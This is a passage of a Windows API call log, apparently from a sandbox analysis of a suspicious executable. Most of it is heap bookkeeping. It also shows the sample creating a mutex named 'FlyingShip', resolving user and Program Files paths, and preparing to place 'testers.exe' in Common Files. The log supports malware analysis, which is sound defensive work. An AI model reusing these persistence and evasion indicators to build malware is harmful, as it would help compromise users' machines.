CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.420] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.420] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff1c8 | out: hHeap=0xbe0000) returned 1 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21788 | out: hHeap=0xbe0000) returned 1 [0245.420] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.420] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1dd30 | out: hHeap=0xbe0000) returned 1 [0245.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21798 | out: hHeap=0xbe0000) returned 1 [0245.420] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.421] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.421] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.421] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.421] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.421] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d5a0 | out: hHeap=0xbe0000) returned 1 [0245.421] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.421] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0245.421] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0245.421] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="FlyingShip") returned 0x114 [0245.422] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.423] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.423] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0245.423] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0245.423] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.424] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.424] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.424] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d5a0 | out: hHeap=0xbe0000) returned 1 [0245.424] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0245.424] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.424] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d5a0 | out: hHeap=0xbe0000) returned 1 [0245.424] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.425] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x8af57c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21798 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff200 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf99d0 [0245.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc22880 | out: hHeap=0xbe0000) returned 1 [0245.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21808 | out: hHeap=0xbe0000) returned 1 [0245.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf99a0 | out: hHeap=0xbe0000) returned 1 [0245.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9988 | out: hHeap=0xbe0000) returned 1 [0245.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1de70 | out: hHeap=0xbe0000) returned 1 [0245.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217a8 | out: hHeap=0xbe0000) returned 1 [0245.426] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1de70 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9988 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217a8 [0245.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9988 | out: hHeap=0xbe0000) returned 1 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1de98 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9988 [0245.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf99a0 [0245.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21808 [0245.427] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf99a0 | out: hHeap=0xbe0000) returned 1 [0245.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1dee8 [0245.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf99a0 [0245.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21888 [0245.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc22880 [0245.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21838 [0245.427] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bef18 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0245.429] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c58 [0245.429] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21888 | out: hHeap=0xbe0000) returned 1 [0245.429] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x8af57c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21888 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1b090 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9cb8 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc22880 | out: hHeap=0xbe0000) returned 1 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21838 | out: hHeap=0xbe0000) returned 1 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c58 | out: hHeap=0xbe0000) returned 1 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf99a0 | out: hHeap=0xbe0000) returned 1 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1dee8 | out: hHeap=0xbe0000) returned 1 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21808 | out: hHeap=0xbe0000) returned 1 [0245.430] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1dee8 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf99a0 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21808 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf99a0 | out: hHeap=0xbe0000) returned 1 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1ddf8 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf99a0 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c58 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21838 [0245.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c58 | out: hHeap=0xbe0000) returned 1 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1dd80 [0245.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c58 [0245.431] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21818 [0245.431] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc22880 [0245.431] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21848 [0245.431] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x8bef18 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9cd0 [0245.432] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21818 | out: hHeap=0xbe0000) returned 1 [0245.432] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x8af57c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0245.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21818 [0245.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1de48 [0245.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ca0 [0245.432] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc22880 | out: hHeap=0xbe0000) returned 1 [0245.432] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21848 | out: hHeap=0xbe0000) returned 1 [0245.432] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9cd0 | out: hHeap=0xbe0000) returned 1 [0245.432] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c58 | out: hHeap=0xbe0000) returned 1 [0245.433] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1dd80 | out: hHeap=0xbe0000) returned 1 [0245.433] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21838 | out: hHeap=0xbe0000) returned 1 [0245.433] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1dd80 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c58 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21838 [0245.433] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c58 | out: hHeap=0xbe0000) returned 1 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1ddd0 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c58 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9cd0 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21848 [0245.433] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9cd0 | out: hHeap=0xbe0000) returned 1 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1de20 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9cd0 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21858 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc22880 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217d8 [0245.433] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf138, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c88 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1b048 [0245.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217b8 [0245.433] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc22880 | out: hHeap=0xbe0000) returned 1 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217d8 | out: hHeap=0xbe0000) returned 1 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21858 | out: hHeap=0xbe0000) returned 1 [0245.434] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x8af57c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0245.434] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21858 [0245.434] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff318 [0245.434] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c70 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1b048 | out: hHeap=0xbe0000) returned 1 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217b8 | out: hHeap=0xbe0000) returned 1 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c88 | out: hHeap=0xbe0000) returned 1 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9cd0 | out: hHeap=0xbe0000) returned 1 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1de20 | out: hHeap=0xbe0000) returned 1 [0245.434] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21848 | out: hHeap=0xbe0000) returned 1 [0245.434] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1de20 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9cd0 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21848 [0245.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9cd0 | out: hHeap=0xbe0000) returned 1 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1df10 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9cd0 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c88 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc217b8 [0245.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c88 | out: hHeap=0xbe0000) returned 1 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1df38 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c88 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc217d8 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc22880 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217f8 [0245.435] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c10 [0245.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc22880 | out: hHeap=0xbe0000) returned 1 [0245.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217f8 | out: hHeap=0xbe0000) returned 1 [0245.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217d8 | out: hHeap=0xbe0000) returned 1 [0245.435] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x8af57c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217d8 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff270 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b68 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff270 | out: hHeap=0xbe0000) returned 1 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217d8 | out: hHeap=0xbe0000) returned 1 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c10 | out: hHeap=0xbe0000) returned 1 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c88 | out: hHeap=0xbe0000) returned 1 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1df38 | out: hHeap=0xbe0000) returned 1 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217b8 | out: hHeap=0xbe0000) returned 1 [0245.436] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1df38 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c88 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217b8 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c88 | out: hHeap=0xbe0000) returned 1 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1df60 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c88 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c10 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc217d8 [0245.436] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c10 | out: hHeap=0xbe0000) returned 1 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1df88 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c10 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc217f8 [0245.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc22880 [0245.437] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217c8 [0245.437] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9a48 [0245.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc22880 | out: hHeap=0xbe0000) returned 1 [0245.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217c8 | out: hHeap=0xbe0000) returned 1 [0245.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217f8 | out: hHeap=0xbe0000) returned 1 [0245.437] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x8af57c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0245.437] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217f8 [0245.437] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc638e0 [0245.437] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf99e8 [0245.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9a48 | out: hHeap=0xbe0000) returned 1 [0245.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c10 | out: hHeap=0xbe0000) returned 1 [0245.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1df88 | out: hHeap=0xbe0000) returned 1 [0245.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217d8 | out: hHeap=0xbe0000) returned 1 [0245.437] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1df88 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c10 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217d8 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9a48 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9a00 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc217c8 [0245.438] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9a00 | out: hHeap=0xbe0000) returned 1 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc217e8 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff270 [0245.438] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0245.438] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff270 | out: hHeap=0xbe0000) returned 1 [0245.438] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc217e8 | out: hHeap=0xbe0000) returned 1 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1dfb0 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xc217e8 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1dfd8 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9a00 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21828 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9a78 [0245.438] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21828 | out: hHeap=0xbe0000) returned 1 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xc21828 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9a18 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21868 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9a30 [0245.438] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21868 | out: hHeap=0xbe0000) returned 1 [0245.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcf9a60 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e000 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b98 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21868 [0245.439] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b98 | out: hHeap=0xbe0000) returned 1 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e028 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b98 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bb0 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e050 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bf8 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21878 [0245.439] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bf8 | out: hHeap=0xbe0000) returned 1 [0245.439] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, 